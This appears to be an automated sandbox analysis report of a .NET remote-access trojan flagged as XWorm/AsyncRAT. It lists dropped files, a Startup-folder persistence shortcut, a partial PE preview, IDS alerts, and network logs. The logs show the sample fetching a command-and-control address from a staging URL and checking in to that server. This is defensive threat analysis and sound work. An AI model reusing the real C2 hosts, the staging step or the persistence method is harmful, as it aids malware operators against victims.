                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnpsy0jx.zfu.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ju320r4f.yxe.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ki4h4o42.tsn.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjtw3mz1.qwu.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhvsfuzj.1rl.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvf0pctg.054.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvpf1e4c.c5s.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rapent.lnk

                                          Download File
                                          Process:C:\Users\user\Desktop\1c8DbXc5r0.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Oct 7 01:50:54 2024, mtime=Mon Oct 7 01:50:54 2024, atime=Mon Oct 7 01:50:54 2024, length=39424, window=hide
                                          Category:dropped
                                          Size (bytes):759
                                          Entropy (8bit):5.012031015916383
                                          Encrypted:false
                                          SSDEEP:12:8vqJq2g4N0MWC3lDdY//pa4jLxsfKtVojAfrHUVZJ8zBmV:8vqJqqS3ud+xa43RtqAfAV4zBm
                                          MD5:AEFDC4615BAA47BB7B0A28D255609792
                                          SHA1:1114229152BF13F4481B0D4B5F67607639374428
                                          SHA-256:3C4D81459389DECC5513245BFCBC0E10D7D9ABB94D9BBBCF81F5F867AD5F84FF
                                          SHA-512:4D67076DE21409DD579938710A662EC0F3395C1C3EC4058FD68E7DF2AF9B772E920BD96FE27CB9D044F52D6BC59BC5A395CBF8A8F37732CB734BAEC45C03B10C
                                          Malicious:false
                                          Preview:L..................F.... ...{...c...{...c...{...c...........................t.:..DG..Yr?.D..U..k0.&...&......vk.v....$.Y.c.....$.c.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^GY<............................%..A.p.p.D.a.t.a...B.V.1.....GY:...Roaming.@......CW.^GY:............................~..R.o.a.m.i.n.g.....`.2.....GY\. .rapent.exe..F......GY\.GY\.....*......................c!.r.a.p.e.n.t...e.x.e.......X...............-.......W....................C:\Users\user\AppData\Roaming\rapent.exe........\.....\.....\.....\.....\.r.a.p.e.n.t...e.x.e.`.......X.......992547...........hT..CrF.f4... .~.T..b...,.......hT..CrF.f4... .~.T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                          C:\Users\user\AppData\Roaming\rapent.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\1c8DbXc5r0.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):39424
                                          Entropy (8bit):5.602390271817693
                                          Encrypted:false
                                          SSDEEP:768:GVKCdLYWWLvKHjy9DTYfAFWP+9MzCM6cOMhVrPY:G7ctLvKHjenF99MzCM6cOMvrY
                                          MD5:49AA60A3EE7D3B03D16AA591024CBBC7
                                          SHA1:AB7A4B389A7583370A53792852A819AA34D5D2E8
                                          SHA-256:E9F7EDCB41000F0375515A01DAE7D155723B8BBBA28C7BAE75C63E7D98FDEDAA
                                          SHA-512:5DFCA79A35FE60F0CBE141A87EA1FED9AAB1D8726D771E69302733BE0F9E7FAACAFC31CB3F4545A8D2AF971A7E97D8A96D92D1C29CBC0FA8DE4D0BC499674448
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\rapent.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\rapent.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 89%
                                          • Antivirus: Virustotal, Detection: 76%, Browse
                                          Joe Sandbox View:
                                          • Filename: , Detection: malicious, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.................................P...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Y..8V............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):5.602390271817693
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:1c8DbXc5r0.exe
                                          File size:39'424 bytes
                                          MD5:49aa60a3ee7d3b03d16aa591024cbbc7
                                          SHA1:ab7a4b389a7583370a53792852a819aa34d5d2e8
                                          SHA256:e9f7edcb41000f0375515a01dae7d155723b8bbba28c7bae75c63e7d98fdedaa
                                          SHA512:5dfca79a35fe60f0cbe141a87ea1fed9aab1d8726d771e69302733be0f9e7faacafc31cb3f4545a8d2af971a7e97d8a96d92d1c29cbc0fa8de4d0bc499674448
                                          SSDEEP:768:GVKCdLYWWLvKHjy9DTYfAFWP+9MzCM6cOMhVrPY:G7ctLvKHjenF99MzCM6cOMvrY
                                          TLSH:38035C447BD08216D5EE6FFA69B3B5060730F6038A13D79E4CD889675B37B848A413EB
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:90cececece8e8eb0

                                          Static PE Info

                                          General

                                          Entrypoint:0x40af9e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x66F9D0FF [Sun Sep 29 22:13:19 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xaf500x4b.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4f8.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x8fa40x9000944391760fd16f81edc4808073539b68False0.4962565104166667data5.726552571385622IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xc0000x4f80x60006d622f0afad8dd4db2a7a59f19557e9False0.376953125data3.759813864057344IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xe0000xc0x20056add030f8e08e0b0319969a5ad7a879False0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0xc0a00x264data0.45588235294117646
                                          RT_MANIFEST0xc3080x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-10-07T04:51:08.553146+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:51:08.553146+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:51:08.980911+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449738147.185.221.1855624TCP
                                          2024-10-07T04:51:09.270583+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:51:09.272872+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449738147.185.221.1855624TCP
                                          2024-10-07T04:51:21.674385+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:51:21.676737+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449738147.185.221.1855624TCP
                                          2024-10-07T04:51:34.080889+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:51:34.085484+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449738147.185.221.1855624TCP
                                          2024-10-07T04:51:38.569939+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:51:38.569939+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:51:47.469232+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:51:47.470728+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449738147.185.221.1855624TCP
                                          2024-10-07T04:51:58.893126+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:51:58.895796+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449738147.185.221.1855624TCP
                                          2024-10-07T04:52:08.174794+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:52:08.175608+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449738147.185.221.1855624TCP
                                          2024-10-07T04:52:08.576283+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1855624192.168.2.449738TCP
                                          2024-10-07T04:52:08.576283+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.1855624192.168.2.449738TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 7, 2024 04:50:55.469443083 CEST49737443192.168.2.418.224.107.108
                                          Oct 7, 2024 04:50:55.469532967 CEST4434973718.224.107.108192.168.2.4
                                          Oct 7, 2024 04:50:55.469630957 CEST49737443192.168.2.418.224.107.108
                                          Oct 7, 2024 04:50:55.511298895 CEST49737443192.168.2.418.224.107.108
                                          Oct 7, 2024 04:50:55.511362076 CEST4434973718.224.107.108192.168.2.4
                                          Oct 7, 2024 04:50:56.033669949 CEST4434973718.224.107.108192.168.2.4
                                          Oct 7, 2024 04:50:56.033821106 CEST49737443192.168.2.418.224.107.108
                                          Oct 7, 2024 04:50:56.036633015 CEST49737443192.168.2.418.224.107.108
                                          Oct 7, 2024 04:50:56.036686897 CEST4434973718.224.107.108192.168.2.4
                                          Oct 7, 2024 04:50:56.037117004 CEST4434973718.224.107.108192.168.2.4
                                          Oct 7, 2024 04:50:56.086931944 CEST49737443192.168.2.418.224.107.108
                                          Oct 7, 2024 04:50:56.101994038 CEST49737443192.168.2.418.224.107.108
                                          Oct 7, 2024 04:50:56.143414021 CEST4434973718.224.107.108192.168.2.4
                                          Oct 7, 2024 04:50:56.219357014 CEST4434973718.224.107.108192.168.2.4
                                          Oct 7, 2024 04:50:56.219770908 CEST4434973718.224.107.108192.168.2.4
                                          Oct 7, 2024 04:50:56.219973087 CEST49737443192.168.2.418.224.107.108
                                          Oct 7, 2024 04:50:56.230228901 CEST49737443192.168.2.418.224.107.108
                                          Oct 7, 2024 04:50:56.412034035 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:50:56.416903973 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:50:56.417023897 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:50:56.581916094 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:50:56.586949110 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:08.553145885 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:08.594361067 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:08.980911016 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:08.986190081 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:09.270582914 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:09.272871971 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:09.278851986 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:21.384712934 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:21.389656067 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:21.674385071 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:21.676737070 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:21.681740046 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:33.790405035 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:33.796087027 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:34.080888987 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:34.085484028 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:34.090873957 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:38.569938898 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:38.618012905 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:46.196469069 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:46.508691072 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:47.118091106 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:47.184578896 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:47.184619904 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:47.184648037 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:47.469232082 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:47.470727921 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:47.475624084 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:58.602705002 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:58.607865095 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:58.893126011 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:51:58.895796061 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:51:58.900866985 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:52:07.836986065 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:52:07.842036963 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:52:08.174793959 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:52:08.175607920 CEST4973855624192.168.2.4147.185.221.18
                                          Oct 7, 2024 04:52:08.180569887 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:52:08.576282978 CEST5562449738147.185.221.18192.168.2.4
                                          Oct 7, 2024 04:52:08.617929935 CEST4973855624192.168.2.4147.185.221.18

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 7, 2024 04:50:55.413964987 CEST5769353192.168.2.41.1.1.1
                                          Oct 7, 2024 04:50:55.456665993 CEST53576931.1.1.1192.168.2.4
                                          Oct 7, 2024 04:50:56.392735004 CEST5241453192.168.2.41.1.1.1
                                          Oct 7, 2024 04:50:56.410598993 CEST53524141.1.1.1192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 7, 2024 04:50:55.413964987 CEST192.168.2.41.1.1.10x7309Standard query (0)ser0xen.comA (IP address)IN (0x0001)false
                                          Oct 7, 2024 04:50:56.392735004 CEST192.168.2.41.1.1.10xb36fStandard query (0)models-subscriptions.gl.at.ply.ggA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 7, 2024 04:50:55.456665993 CEST1.1.1.1192.168.2.40x7309No error (0)ser0xen.com18.224.107.108A (IP address)IN (0x0001)false
                                          Oct 7, 2024 04:50:56.410598993 CEST1.1.1.1192.168.2.40xb36fNo error (0)models-subscriptions.gl.at.ply.gg147.185.221.18A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • ser0xen.com

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.44973718.224.107.1084436444C:\Users\user\Desktop\1c8DbXc5r0.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-07 02:50:56 UTC67OUTGET /pl.txt HTTP/1.1
                                          Host: ser0xen.com
                                          Connection: Keep-Alive
                                          2024-10-07 02:50:56 UTC282INHTTP/1.1 200 OK
                                          Date: Mon, 07 Oct 2024 02:50:56 GMT
                                          Server: Apache/2.4.59 (Amazon Linux) OpenSSL/3.0.8
                                          Last-Modified: Sat, 21 Sep 2024 02:03:17 GMT
                                          ETag: "28-622978f27bc18"
                                          Accept-Ranges: bytes
                                          Content-Length: 40
                                          Connection: close
                                          Content-Type: text/plain; charset=UTF-8
                                          2024-10-07 02:50:56 UTC40INData Raw: 6d 6f 64 65 6c 73 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 35 35 36 32 34 0a
                                          Data Ascii: models-subscriptions.gl.at.ply.gg:55624


                                          Statistics

                                          CPU Usage

